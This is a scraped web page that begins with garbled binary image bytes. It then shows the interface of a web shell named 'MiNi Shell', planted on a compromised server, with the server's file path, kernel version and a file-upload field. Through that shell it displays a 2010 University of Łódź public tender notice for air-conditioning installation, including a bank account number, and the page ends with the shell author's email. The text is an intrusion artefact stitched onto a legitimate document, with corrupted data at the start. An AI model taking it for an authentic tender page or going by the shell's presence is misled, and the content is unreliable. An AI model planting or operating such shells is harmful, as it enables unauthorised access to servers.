JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101119/376006-N-2010.html

<p class="kh_header"><b>Łódź: Zaprojektowanie i wykonanie instalacji klimatyzatorów w Budynku Wydziału Zarządzania przy ul. Matejki 22/26 oraz w Budynku Wydziału Prawa  i Administracji przy ul. Kopcińskiego 8/12</b><br>
<b>Numer ogłoszenia: 376006 - 2010; data zamieszczenia: 19.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Łódzki , ul. Narutowicza 65, 90-131 Łódź, woj. łódzkie, tel. 0-42 635 43 54, faks 0-42 635 43 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie instalacji klimatyzatorów w Budynku Wydziału Zarządzania przy ul. Matejki 22/26 oraz w Budynku Wydziału Prawa  i Administracji przy ul. Kopcińskiego 8/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie i wykonanie instalacji klimatyzatorów w Budynku Wydziału Zarządzania przy ul. Matejki 22/26 oraz w Budynku Wydziału Prawa  i Administracji przy ul. Kopcińskiego 8/12

Część 1 
Zakres robót wykonania instalacji klimatyzatorów w Budynku Wydziału  Zarządzania przy ul. Matejki 22/26 
Zakres prac winien obejmować zaprojektowanie i wykonanie dwóch nowych układów klimatyzacji typu VRF i  przebudowa jednego istniejącego układu oraz instalację odprowadzenia skroplin wraz z towarzyszącymi drobnymi robotami budowlanymi.
Dla pomieszczeń na parterze o nr 13, 14, 15, 16, 17 , 19 należy wybudować nowy układ klimatyzacji VRF
Dla pomieszczeń na parterze o nr 6 w istniejącym układzie VRF należy przenieść istniejąca jednostkę wewnętrzną do pomieszczenia 6 A oraz zainstalować nową dodatkową jednostkę wewnętrzną w pomieszczeniu 6 B
Dla pomieszczeń na I piętrze o nr 105, 107, 108A1 ,108A2, 108A3, 108B1, 108B2 należy wykonać nowy układ klimatyzacji.
Nowe instalacje winny być wykonane na urządzeniach typu Mitsubihsi  electric lub równoważne z zastosowaniem w pomieszczeniach sterowników ściennych i wykonać sygnalizację pracy urządzeń sprowadzonej do portierni jak wcześniej zastosowano w istniejących układach.
Jednostki zewnętrzne VRF zasilić z pomieszczenia rozdzielni głównych 
- z rozdzielnicy RGS-1 lub RGS-2. 
Jednostki wewnętrzne - pomieszczenie 6B zasilić z tablicy T2. 
Pomieszczenia 13, 14, 15, 16, 17, 19 zasilić z tablicy T1. 
Pomieszczenia na I piętrze zasilić z tablicy T2.
Zamawiający dołącza pomocnicze rysunki pomieszczeń , w których mają być zainstalowane klimatyzatory- Załącznik nr A do SIWZ

Część 2	
 Zakres robót wykonania instalacji klimatyzatorów w budynku Wydziału Prawa i    Administracji przy ul. Kopcińskiego 8/12
Zakres prac winien obejmować zaprojektowanie i wykonanie instalacji ośmiu nowych układów klimatyzacji przystosowanych do pracy całorocznej w LDP z instalacją odprowadzenia skroplin oraz z towarzyszącymi drobnymi robotami budowlanymi.
Dla pomieszczeń na I Pietrze o nr 2.05, 2.32, 2.42, 2.58 o mocy 2,5 k W każdy
Dla pomieszczeń na Iv Pietrze o nr 4.15, 4.51, 4.62, 4.79 o mocy 2,5 k W każdy
Nowe instalacje winny być wykonane na urządzeniach typu Mitsubihsi lub równoważne
Klimatyzatory należy zasilić z następujących rozdzielnic:

2.05 - z tablicy TA22,
2.32 - 		TB22, 
2.42 - 		TB21, 
2.58 - 		TC22, 
4.15 - 		TA42, 
4.51 - 		TB42, 
4.62 - 		TB41, 
4.79 - 		TC41

Zamawiający załącza pomocnicze rysunki pomieszczeń, w których mają być zamieszczone urządzenia.- Załącznik nr B  do SIWZ

Przedmiot zamówienia należy wykonać kompleksowo w sposób umożliwiający jego oddanie do eksploatacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających na postawie art. 67 ust. 1 pkt. 6 ustawy do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.12.20-4, 45.33.12.00-8, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca przystępujący do niniejszego postępowania musi wnieść wadium przetargowe w wysokości  dot. części 1: 3.934,43zł (słownie zł: trzy tysiące dziewięćset trzydzieści cztery  złote 43/100 gr.). 
Dot. część 2: 983,00 (dziewięćset osiemdziesiąt trzy złote 00/100 gr. )          
Wpłacona przez Wykonawcę kwota wadium powinna również uwzględniać ewentualne koszty związane z prowizją bankową za przelew kwoty wadium na konto wskazane przez Zamawiającego.
Wadium należy wnieść najpóźniej do dnia ostatecznego terminu składania ofert. 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).

Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania  ofertą zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust.5 ustawy.
Wadium wnoszone w formach innych niż w pieniądzu, winno być złożone w formie oryginału w siedzibie zamawiającego (oddzielnie od oferty) - Biuro Inwestycji i Nieruchomości UŁ, ul. Lindleya 3, 90-131 Łódź, pok.226 w godz. 7.30 - 15.30.

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego.
Nr konta Uniwersytetu Łódzkiego: 
Bank Polska Kasa Opieki S.A. II Oddział w Łodzi, ul. Piotrkowska 270, 
nr 86 1240 3028 1111 0000 2822 2488.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Oświadczenia z art. 22 ust. 1 - Załącznik nr 2
b)	Karty katalogowe foldery informacyjne itd. oferowanych urządzeń klimatyzacyjnych, z których w sposób niezbędny wątpliwości wynika że, spełnia wymogi określone w pkt. 3.1,3.2 SIWZ.
Karty katalogi i foldery muszą być przedstawione w języku polskim.
c)	Oświadczenie Wykonawcy potwierdzające, że produkty będące przedmiotem zamówienia publicznego posiadają oznakowanie zgodności, zgodnie z nowelizacją ustawy o systemie zgodności z dnia 15 grudnia 2006 r. (Dz. U. z 2006 r. nr 249, poz. 1834) - Załącznik nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uni.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Łódzki, Biuro Inwestycji i Nieruchomości, 90-131 Łódź, ul. Lindleya 3, II p, pokój 226 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 09:30, miejsce: Uniwersytet Łódzki, Biuro Inwestycji i Nieruchomości, 90-131 Łódź, ul. Lindleya 3, II p, pokój 226, do dnia 03.12.2010 r., do godz. 09:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres robót wykonania instalacji klimatyzatorów w Budynku Wydziału  Zarządzania przy ul. Matejki 22/26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac winien obejmować zaprojektowanie i wykonanie dwóch nowych układów klimatyzacji typu VRF i  przebudowa jednego istniejącego układu oraz instalację odprowadzenia skroplin wraz z towarzyszącymi drobnymi robotami budowlanymi.
Dla pomieszczeń na parterze o nr 13, 14, 15, 16, 17 , 19 należy wybudować nowy układ klimatyzacji VRF
Dla pomieszczeń na parterze o nr 6 w istniejącym układzie VRF należy przenieść istniejąca jednostkę wewnętrzną do pomieszczenia 6 A oraz zainstalować nową dodatkową jednostkę wewnętrzną w pomieszczeniu 6 B
Dla pomieszczeń na I piętrze o nr 105, 107, 108A1 ,108A2, 108A3, 108B1, 108B2 należy wykonać nowy układ klimatyzacji.
Nowe instalacje winny być wykonane na urządzeniach typu Mitsubihsi  electric lub równoważne z zastosowaniem w pomieszczeniach sterowników ściennych i wykonać sygnalizację pracy urządzeń sprowadzonej do portierni jak wcześniej zastosowano w istniejących układach.
Jednostki zewnętrzne VRF zasilić z pomieszczenia rozdzielni głównych 
- z rozdzielnicy RGS-1 lub RGS-2. 
Jednostki wewnętrzne - pomieszczenie 6B zasilić z tablicy T2. 
Pomieszczenia 13, 14, 15, 16, 17, 19 zasilić z tablicy T1. 
Pomieszczenia na I piętrze zasilić z tablicy T2.
Zamawiający dołącza pomocnicze rysunki pomieszczeń , w których mają być zainstalowane klimatyzatory- Załącznik nr A do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.12.20-4, 45.33.12.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres robót wykonania instalacji klimatyzatorów w budynku Wydziału Prawa i    Administracji przy ul. Kopcińskiego 8/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac winien obejmować zaprojektowanie i wykonanie instalacji ośmiu nowych układów klimatyzacji przystosowanych do pracy całorocznej w LDP z instalacją odprowadzenia skroplin oraz z towarzyszącymi drobnymi robotami budowlanymi.
Dla pomieszczeń na I Pietrze o nr 2.05, 2.32, 2.42, 2.58 o mocy 2,5 k W każdy
Dla pomieszczeń na Iv Pietrze o nr 4.15, 4.51, 4.62, 4.79 o mocy 2,5 k W każdy
Nowe instalacje winny być wykonane na urządzeniach typu Mitsubihsi lub równoważne
Klimatyzatory należy zasilić z następujących rozdzielnic:

2.05 - z tablicy TA22,
2.32 - 		TB22, 
2.42 - 		TB21, 
2.58 - 		TC22, 
4.15 - 		TA42, 
4.51 - 		TB42, 
4.62 - 		TB41, 
4.79 - 		TC41

Zamawiający załącza pomocnicze rysunki pomieszczeń, w których mają być zamieszczone urządzenia.- Załącznik nr B  do SIWZ

Przedmiot zamówienia należy wykonać kompleksowo w sposób umożliwiający jego oddanie do eksploatacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.12.20-4, 45.33.12.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com